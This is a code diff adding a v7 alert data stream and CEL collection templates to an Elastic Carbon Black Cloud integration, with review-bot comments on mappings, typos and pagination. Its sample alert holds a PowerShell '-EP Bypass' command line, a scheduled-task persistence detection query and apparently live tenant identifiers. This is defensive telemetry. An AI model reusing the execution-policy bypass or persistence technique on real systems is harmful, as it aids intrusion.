+ - name: cmdline + type: keyword + description: Command line executed by the child process. + - name: username + type: keyword + description: User context in which the child process was executed. + - name: effective_reputation + type: keyword + description: Effective reputation of the child process hash. + # blocked process fields + - name: blocked_process + type: group + description: Fields related to the blocked process information. + fields: + - name: hash + type: group + description: Hash values associated with the child process. + fields: + - name: sha256 + type: keyword + description: SHA-256 hash of the child process binary; for any process terminated by the sensor. + - name: md5 + type: keyword + description: MD5 hash of the child process binary; for any process terminated by the sensor. + - name: name + type: keyword + description: Tokenized file path of the files blocked by sensor action. + - name: effective_reputation + type: keyword + description: Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred. + # watchlist fields + - name: watchlists + type: group + description: List of watchlists associated with an alert. + fields: + - name: id + type: keyword + description: Identifier of the watchlist. + - name: name + type: keyword + description: Name of the watchlist. + # determination fields + - name: determination + type: group + description: Fields related to alert determination + fields: + - name: change_timestamp + type: date + description: Timestamp of the determination change + - name: value + type: keyword + description: Value of the determination + - name: changed_by_type + type: keyword + description: Type of entity that changed the determination + - name: changed_by + type: keyword + description: Entity that changed the determination + # workflow fields + - name: workflow + type: group + description: Tracking system for alerts as they are triaged and resolved. 
+ fields: + - name: changed_by + type: keyword + description: The name of process which changed the workflow. + - name: changed_by_type + type: keyword + description: The type of user who changed the workflow. + - name: changed_by_autoclose_rule_id + type: keyword + description: The rule id that auto closed the workflow. + - name: change_timestamp + type: date + description: The last change/update time of workflow. + - name: closure_reason + type: keyword + description: Reason for which the workflow was closed. + - name: status + type: keyword + description: The status of the workflow. + # mdr fields + - name: mdr + type: group + description: Fields related to MDR. + fields: + - name: alert + type: boolean + description: Is the alert eligible for review by Carbon Black MDR Analysts. + - name: alert_notes_present + type: boolean + description: Customer visible notes at the alert level that were added by a MDR analyst. + - name: threat_notes_present + type: boolean + description: Customer visible notes at the threat level that were added by a MDR analyst. + - name: determination + type: group + description: MDR updatable classification of the alert. + fields: + - name: change_timestamp + type: date + description: When the last MDR classification change occurred, it is a ISO 8601 UTC timestamp. + - name: value + type: keyword + description: A record that identifies the whether the alert was determined to represent a likely or unlikely threat. + - name: workflow + type: group + description: MDR-updatable workflow of the alert. + fields: + - name: change_timestamp + type: date + description: WWhen the last MDR status change occurred, it is a ISO 8601 UTC timestamp. + - name: is_assigned + type: boolean + description: If the workflow is assigned or not. + - name: status + type: boolean + description: Primary value used to capture status change during MD Analyst's alert triage. 
+ - name: classification + type: group + description: MDR-updatable classification of the alert. + fields: + - name: change_timestamp + type: date + description: WWhen the last MDR classification change occurred, it is a ISO 8601 UTC timestamp. + # network connection fields + - name: netconn + type: group + description: Fields related to network connections + fields: + - name: remote_port + type: integer + description: TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port. + - name: local_port + type: integer + description: TCP or UDP port used by the local side of the network connection. + - name: protocol + type: keyword + description: Network protocol of the network connection. + - name: remote_domain + type: keyword + description: Domain name (FQDN) associated with the remote end of the network connection. + - name: remote_ip + type: ip + description: IP address of the remote side of the network connection. + - name: local_ip + type: ip + description: IP address of the local side of the network connection. + - name: remote_ipv4 + type: ip + description: IPv4 address of the remote side of the network connection. + - name: local_ipv4 + type: ip + description: IPv4 address of the local side of the network connection. + - name: remote_ipv6 + type: ip + description: IPv6 address of the remote side of the network connection. + - name: local_ipv6 + type: ip + description: IPv6 address of the local side of the network connection. diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/manifest.yml b/packages/carbon_black_cloud/data_stream/alert_v7/manifest.yml new file mode 100644 index 00000000000..d3aea7ba490 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/manifest.yml 
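Review bot: `mdr.workflow.status` is mapped as `boolean`, while the parallel top-level `workflow.status` is `keyword` and the field's own description says it captures the status value; if the v7 API returns a string there, such documents would be rejected with a mapping exception, so `type: keyword` looks like the intended mapping and is worth checking against the schema. Several descriptions carry copy-paste errors: `product_name` is described as the vendor's name, the `blocked_process.hash.*` descriptions say "child process", and there are typos `TCategories`, `An list`, `S tactic`, `WWhen` (twice) and `indicator of comprise`. `device.external_ip` and `device.internal_ip` are `keyword` whereas the `netconn.*` addresses are `ip`; mapping them as `ip`, guarded by the same convert/on_failure pattern the pipeline already uses for the netconn fields, would let CIDR queries and detection rules work on device addresses as well, provided the upstream values are plain addresses.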
@@ -0,0 +1,152 @@
+title: Alert V7
+type: logs
+streams:
+ - input: cel
+ title: Collect alerts from Carbon Black Cloud using v7 API
+ description: Collect alerts from Carbon Black Cloud.
+ template_path: cel.yml.hbs
+ vars:
+ - name: interval
+ type: text
+ title: Interval
+ description: Interval to fetch alerts from Carbon Black Cloud. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 1m
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ description: How far back to pull the alerts from the Carbon Black Cloud API. Supported units for this parameter are h/m/s.
+ default: 24h
+ multi: false
+ required: true
+ show_user: true
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: false
+ show_user: true
+ default: 2m
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - carbon_black_cloud-alert
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+ - input: aws-s3
+ title: Collect alerts from Carbon Black Cloud - Data Forwarder 2.0 Schema [Beta]
+ description: Collect alerts from Carbon Black Cloud.
+ template_path: aws-s3.yml.hbs
+ vars:
+ - name: queue_url_alert
+ type: text
+ title: "[Alert][SQS] Queue URL"
+ multi: false
+ required: false
+ show_user: true
+ description: |-
+ URL of the AWS SQS queue that messages will be received from. This is only required if you want to collect logs via AWS SQS.
+ This is an alert data stream specific queue URL. This will override the global queue URL if provided.
+ - name: bucket_list_prefix
+ type: text
+ title: "[S3] Bucket Prefix"
+ multi: false
+ required: false
+ show_user: true
+ default: alert_logs_v7
+ description: Prefix to apply for the list request to the S3 bucket.
+ - name: interval
+ type: text
+ title: "[S3] Interval"
+ multi: false
+ required: false
+ show_user: true
+ default: 1m
+ description: Time interval for polling listing of the S3 bucket. Supported units for this parameter are h/m/s.
+ - name: number_of_workers
+ type: integer
+ title: "[S3] Number of Workers"
+ multi: false
+ required: false
+ show_user: true
+ default: 5
+ description: Number of workers that will process the S3 objects listed.
+ - name: visibility_timeout
+ type: text
+ title: "[SQS] Visibility Timeout"
+ multi: false
+ required: false
+ show_user: true
+ default: 300s
+ description: The duration that the received messages are hidden from subsequent retrieve requests after being retrieved by a ReceiveMessage request. The maximum is 12 hours. Supported units for this parameter are h/m/s.
+ - name: api_timeout
+ type: text
+ title: "[SQS] API Timeout"
+ multi: false
+ required: false
+ show_user: true
+ default: 120s
+ description: The maximum duration of AWS API can take. The maximum is half of the visibility timeout value. Supported units for this parameter are h/m/s.
+ - name: max_number_of_messages
+ type: integer
+ title: "[SQS] Maximum Concurrent SQS Messages"
+ required: false
+ show_user: true
+ default: 5
+ description: The maximum number of SQS messages that can be inflight at any time.
+ - name: file_selectors
+ type: yaml
+ title: "[SQS] File Selectors"
+ multi: false
+ required: false
+ show_user: false
+ default: |
+ # - regex: "alert_logs/"
+ description: "If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. \nThis is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. \nIf file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. \nRegexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed.\n[NOTE]: It is recommended to use data stream specific SQS queues instead of file_selectors to avoid data loss."
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - carbon_black_cloud-alert
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/sample_event.json b/packages/carbon_black_cloud/data_stream/alert_v7/sample_event.json
new file mode 100644
index 00000000000..0297d2ffdd8
--- /dev/null
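Review bot: The `file_selectors` example `# - regex: "alert_logs/"` does not match this stream's `bucket_list_prefix` default `alert_logs_v7`, so a user who uncomments it would select keys from the wrong prefix; `# - regex: "alert_logs_v7/"` keeps the two defaults consistent. Both inputs default `tags` to `carbon_black_cloud-alert`, which is presumably also what the existing alert data stream uses, so events from the two streams could not be told apart by tag for routing or detection rules; a distinct `carbon_black_cloud-alert_v7` would separate them. The `cel` stream declares no credential or API-URL variables in this file, so they are presumably defined at package level; stating that in the stream description would save operators a search.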
+++ b/packages/carbon_black_cloud/data_stream/alert_v7/sample_event.json 
@@ -0,0 +1,200 @@ +{ + "@timestamp": "2024-03-13T08:02:36.578Z", + "agent": { + "ephemeral_id": "9c46ff77-c269-4593-a3d8-efd89fbdca66", + "id": "db2930ff-774e-4541-bcd4-1a6a1d656167", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "backend_timestamp": "2024-03-13T08:03:29.540Z", + "backend_update_timestamp": "2024-03-13T08:03:29.540Z", + "category": "THREAT", + "determination": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "value": "NONE" + }, + "device": { + "external_ip": "75.98.230.194", + "internal_ip": "172.16.100.140", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "default", + "policy_id": 6525, + "target_value": "MEDIUM" + }, + "ioc": { + "hit": "(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))", + "id": "d1080521-e617-4e45-94e0-7a145c62c90a" + }, + "is_updated": false, + "mdr": { + "alert": false, + "alert_notes_present": false, + "threat_notes_present": false + }, + "ml_classification_final_verdict": "NOT_ANOMALOUS", + "ml_classification_global_prevalence": "LOW", + "ml_classification_org_prevalence": "LOW", + "organization_key": "7DESJ9GN", + "parent": { + "cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275", + "hash": { + "md5": "145dcf6706eeea5b066885ee17964c09", + "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3" + }, + "name": "c:\\windows\\system32\\svchost.exe", + "pid": 
1916, + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "policy_applied": "NOT_APPLIED", + "primary_event_id": "re9M9hp8TbGLqyk6QXqQqA-0", + "process": { + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "effective_reputation": "TRUSTED_WHITE_LIST", + "guid": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" + }, + "issuer": [ + "Microsoft Windows Production PCA 2011" + ], + "name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "pid": 5172, + "publisher": [ + "Microsoft Windows" + ], + "reputation": "TRUSTED_WHITE_LIST", + "username": "NT AUTHORITY\\SYSTEM" + }, + "reason_code": "c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d", + "report": { + "description": "Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. 
If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.", + "id": "LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a", + "link": "https://attack.mitre.org/techniques/T1053/", + "name": "Execution - AMSI - New Fileless Scheduled Task Behavior Detected", + "tags": [ + "execution", + "privesc", + "persistence", + "t1053", + "windows", + "amsi", + "attack", + "attackframework" + ] + }, + "run_state": "RAN", + "sensor_action": "ALLOW", + "threat_id": "C21CA826573A8D974C1E93C8471AAB7F", + "threat_notes_present": false, + "type": "WATCHLIST", + "url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN", + "watchlists": [ + { + "id": "Ci7w5B4URg6HN60hatQMQ", + "name": "AMSI Threat Intelligence" + } + ], + "workflow": { + "change_timestamp": "2024-03-13T08:03:29.540Z", + "changed_by": "ALERT_CREATION", + "changed_by_type": "SYSTEM", + "closure_reason": "NO_REASON", + "status": "OPEN" + } + } + }, + "data_stream": { + "dataset": "carbon_black_cloud.alert_v7", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "db2930ff-774e-4541-bcd4-1a6a1d656167", + "snapshot": false, + "version": "8.12.1" + }, + "event": { + "agent_id_status": "verified", + "dataset": "carbon_black_cloud.alert_v7", + "end": "2024-03-13T08:00:09.894Z", + "id": "1c6aba68-24cc-41e3-ad8e-4b545a587b55", + "ingested": "2024-04-10T09:06:02Z", + "kind": "alert", + "original": 
"{\"alert_notes_present\":false,\"alert_url\":\"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55\\u0026orgKey=7DESJ9GN\",\"asset_group\":[],\"backend_timestamp\":\"2024-03-13T08:03:29.540Z\",\"backend_update_timestamp\":\"2024-03-13T08:03:29.540Z\",\"childproc_cmdline\":\"\",\"childproc_guid\":\"\",\"childproc_username\":\"\",\"detection_timestamp\":\"2024-03-13T08:02:36.578Z\",\"determination\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by\":\"ALERT_CREATION\",\"changed_by_type\":\"SYSTEM\",\"value\":\"NONE\"},\"device_external_ip\":\"75.98.230.194\",\"device_id\":6612391,\"device_internal_ip\":\"172.16.100.140\",\"device_location\":\"UNKNOWN\",\"device_name\":\"EIP\\\\WW-20002\",\"device_os\":\"WINDOWS\",\"device_os_version\":\"Windows 10 x64\",\"device_policy\":\"default\",\"device_policy_id\":6525,\"device_target_value\":\"MEDIUM\",\"device_uem_id\":\"\",\"device_username\":\"EIP\\\\Administrator\",\"first_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"id\":\"1c6aba68-24cc-41e3-ad8e-4b545a587b55\",\"ioc_hit\":\"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\\\\\ccm\\\\\\\\systemtemp OR crossproc_name:windows\\\\\\\\ccm\\\\\\\\ccmexec.exe OR (process_publisher:\\\"VMware, Inc.\\\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))\",\"ioc_id\":\"d1080521-e617-4e45-94e0-7a145c62c90a\",\"is_updated\":false,\"last_event_timestamp\":\"2024-03-13T08:00:09.894Z\",\"mdr_alert\":false,\"mdr_alert_notes_present\":false,\"mdr_threat_notes_present\":false,\"ml_classification_anomalies\":[],\"ml_classification_final_verdict\":\"NOT_ANOMALOUS\",\"ml_classification_global_prevalence\":\"LOW\",\"ml_classification_org_prevalence\":\"LOW\",\"org_key\":\"7DESJ9GN\",\"parent_cmdline\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs 
-p -s Schedule\",\"parent_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_guid\":\"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275\",\"parent_md5\":\"145dcf6706eeea5b066885ee17964c09\",\"parent_name\":\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"parent_pid\":1916,\"parent_reputation\":\"TRUSTED_WHITE_LIST\",\"parent_sha256\":\"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3\",\"parent_username\":\"NT AUTHORITY\\\\SYSTEM\",\"policy_applied\":\"NOT_APPLIED\",\"primary_event_id\":\"re9M9hp8TbGLqyk6QXqQqA-0\",\"process_cmdline\":\"\\\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -EP Bypass \\\\\\\\eip.demo\\\\sysvol\\\\EIP.DEMO\\\\scripts\\\\Luminol.ps1\",\"process_effective_reputation\":\"TRUSTED_WHITE_LIST\",\"process_guid\":\"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe\",\"process_issuer\":[\"Microsoft Windows Production PCA 2011\"],\"process_md5\":\"2e5a8590cf6848968fc23de3fa1e25f1\",\"process_name\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"process_pid\":5172,\"process_publisher\":[\"Microsoft Windows\"],\"process_reputation\":\"TRUSTED_WHITE_LIST\",\"process_sha256\":\"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3\",\"process_username\":\"NT AUTHORITY\\\\SYSTEM\",\"reason\":\"Process powershell.exe was detected by the report \\\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\\\" in watchlist \\\"AMSI Threat Intelligence\\\"\",\"reason_code\":\"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d\",\"report_description\":\"Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. 
If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.\",\"report_id\":\"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a\",\"report_link\":\"https://attack.mitre.org/techniques/T1053/\",\"report_name\":\"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\",\"report_tags\":[\"execution\",\"privesc\",\"persistence\",\"t1053\",\"windows\",\"amsi\",\"attack\",\"attackframework\"],\"run_state\":\"RAN\",\"sensor_action\":\"ALLOW\",\"severity\":5,\"tags\":null,\"threat_id\":\"C21CA826573A8D974C1E93C8471AAB7F\",\"threat_notes_present\":false,\"type\":\"WATCHLIST\",\"user_update_timestamp\":null,\"watchlists\":[{\"id\":\"Ci7w5B4URg6HN60hatQMQ\",\"name\":\"AMSI Threat Intelligence\"}],\"workflow\":{\"change_timestamp\":\"2024-03-13T08:03:29.540Z\",\"changed_by\":\"ALERT_CREATION\",\"changed_by_type\":\"SYSTEM\",\"closure_reason\":\"NO_REASON\",\"status\":\"OPEN\"}}", + "reason": "Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"", + "severity": 5, + "start": "2024-03-13T08:00:09.894Z" + }, + "host": { + "hostname": "WW-20002", + "id": "6612391", + "name": "WW-20002", + "os": { + "type": "windows", + "version": "Windows 10 x64" + } + }, + "input": { + "type": "cel" + }, + "process": { + "command_line": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1", + "entity_id": "7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "2e5a8590cf6848968fc23de3fa1e25f1", + "sha256": "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3" 
+ },
+ "name": "powershell.exe",
+ "parent": {
+ "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule",
+ "entity_id": "7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275",
+ "executable": "c:\\windows\\system32\\svchost.exe",
+ "hash": {
+ "md5": "145dcf6706eeea5b066885ee17964c09",
+ "sha256": "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3"
+ },
+ "name": "svchost.exe",
+ "pid": 1916
+ },
+ "pid": 5172
+ },
+ "related": {
+ "hash": [
+ "f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3",
+ "145dcf6706eeea5b066885ee17964c09",
+ "9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3",
+ "2e5a8590cf6848968fc23de3fa1e25f1"
+ ],
+ "hosts": [
+ "WW-20002",
+ "EIP"
+ ],
+ "user": [
+ "Administrator"
+ ]
+ },
+ "tags": [
+ "preserve_original_event",
+ "forwarded",
+ "carbon_black_cloud-alert"
+ ],
+ "user": {
+ "domain": "EIP",
+ "name": "Administrator"
+ }
+}
\ No newline at end of file
diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-cel-config.yml b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-cel-config.yml
new file mode 100644
index 00000000000..ff03928cbb3
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-cel-config.yml
@@ -0,0 +1,11 @@
+input: cel
+service: carbon_black_cloud
+vars:
+ hostname: http://{{Hostname}}:{{Port}}
+ org_key: xxxx
+ custom_api_id: xxxx
+ custom_api_secret_key: xxxx
+data_stream:
+ vars:
+ preserve_original_event: true
+ enable_request_tracer: true
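Review bot: The sample event carries `"external_ip": "75.98.230.194"` (repeated inside `event.original`), which appears to be a routable public address rather than one from a documentation or test range; the endpoint_event fixture later on this page uses 67.43.156.x for the same purpose. This file is presumably regenerated from the system-test fixture, so the replacement belongs in that fixture, which is not visible here, with the sample regenerated afterwards. The org key, hostname and account name in the event also read like values captured from a live tenant and are worth a check before they are published as documentation.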
diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-default-config.yml b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-httpjson-config.yml
similarity index 100%
rename from packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-default-config.yml
rename to packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/_dev/test/system/test-httpjson-config.yml
diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/cel.yml.hbs b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/cel.yml.hbs
new file mode 100644
index 00000000000..9494a994cbe
--- /dev/null
+++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/cel.yml.hbs
@@ -0,0 +1,61 @@
+config_version: 2
+interval: {{interval}}
+{{#if http_client_timeout}}
+resource.timeout: {{http_client_timeout}}
+{{/if}}
+{{#if enable_request_tracer}}
+resource.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+resource.tracer.maxbackups: 5
+{{/if}}
+{{#if proxy_url }}
+resource.proxy_url: {{proxy_url}}
+{{/if}}
+{{#if ssl}}
+resource.ssl: {{ssl}}
+{{/if}}
+resource.url: {{hostname}}/vulnerability/assessment/api/v1/orgs/{{org_key}}/devices/vulnerabilities/summary/_search
+state:
+ api_key: '{{custom_api_secret_key}}/{{custom_api_id}}'
+ want_more: false
+redact:
+ fields:
+ - api_key
+program: |
+ request("POST", state.url).with({
+ "Header":{
+ "Content-Type": ["application/json"],
+ "X-Auth-Token": [state.api_key],
+ },
+ "Body":{
+ "start": state.?cursor.processed_num_rows.orValue(0),
+ "rows": 1000,
+ }.encode_json(),
+ }).do_request().as(resp, bytes(resp.Body).decode_json().as(body, {
+ "events": body.results.map(e, {
+ "message": e.encode_json(),
+ }),
+ "cursor": {
+ ?"processed_num_rows": (
+ has(body.results) && body.results.size() >= 1000 ?
+ optional.of(state.?cursor.processed_num_rows.orValue(0) + 1000)
+ :
+ state.?cursor.processed_num_rows
+ )
+ },
+ "want_more": has(body.results) && body.results.size() >= 1000,
+ "api_key": state.api_key,
+ }))
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/httpjson.yml.hbs b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/httpjson.yml.hbs
index 737d6511c62..d01ab8df6ce 100644
--- a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/httpjson.yml.hbs
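Review bot: The cursor is never rewound: when a page holds fewer than 1000 results, `?"processed_num_rows"` keeps the previous offset, so the next interval's request starts at that offset and rows below it are not requested again, whereas the httpjson template on this page pages from `body.start` afresh on every run. If a full re-read each interval is the intent, the short-page branch should drop the cursor, e.g. `optional.none()` in place of `state.?cursor.processed_num_rows` (inferred from the program text; worth confirming against how the input persists `cursor`). Separately, `resource.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"` names httpjson inside the cel template; `../../logs/cel/http-request-trace-*.ndjson` would name the input that actually writes the trace. The audit cel.yml.hbs hunk further down has the same path.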
+++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/agent/stream/httpjson.yml.hbs
@@ -1,6 +1,9 @@
config_version: 2
interval: {{interval}}
request.method: POST
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
{{#if enable_request_tracer}}
request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
request.tracer.maxbackups: 5
@@ -24,7 +27,6 @@ request.transforms:
target: body.rows
value: '10000'
value_type: int
-request.timeout: 2m
response.pagination:
- set:
target: body.start
diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/elasticsearch/ingest_pipeline/default.yml
index fb51ae35732..8c4d03e7b32 100644
--- a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/elasticsearch/ingest_pipeline/default.yml
@@ -65,7 +65,7 @@ processors:
field: json.highest_risk_score
- append:
field: error.message
- value: '{{{_ingest.on_failure_message}}}'
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- rename:
field: json.severity
target_field: vulnerability.severity
@@ -81,7 +81,7 @@ processors:
field: json.last_sync_ts
- append:
field: error.message
- value: '{{{_ingest.on_failure_message}}}'
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- rename:
field: json.sync_status
target_field: carbon_black_cloud.asset_vulnerability_summary.sync.status
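Review bot: `request.timeout: 2m` used to be set unconditionally; behind the new `{{#if http_client_timeout}}` guard, a policy in which the variable is unset or empty now emits no timeout at all and falls back to the input's built-in default, which, if I recall the httpjson docs correctly, is 30s. Whether existing policies pick up the manifest's `2m` default on upgrade is not something this diff shows, so an `{{else}}` branch emitting `request.timeout: 2m` would preserve the old behaviour for them. The second hunk only removes the old line.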
@@ -112,7 +112,7 @@ processors:
field: json.vuln_count
- append:
field: error.message
- value: '{{{_ingest.on_failure_message}}}'
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
- remove:
field:
- json.last_sync_ts
@@ -159,4 +159,4 @@ on_failure:
value: pipeline_error
- append:
field: error.message
- value: '{{{_ingest.on_failure_message}}}'
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
diff --git a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/manifest.yml b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/manifest.yml
index afa402554a2..522d2e6ed1b 100644
--- a/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/manifest.yml
+++ b/packages/carbon_black_cloud/data_stream/asset_vulnerability_summary/manifest.yml
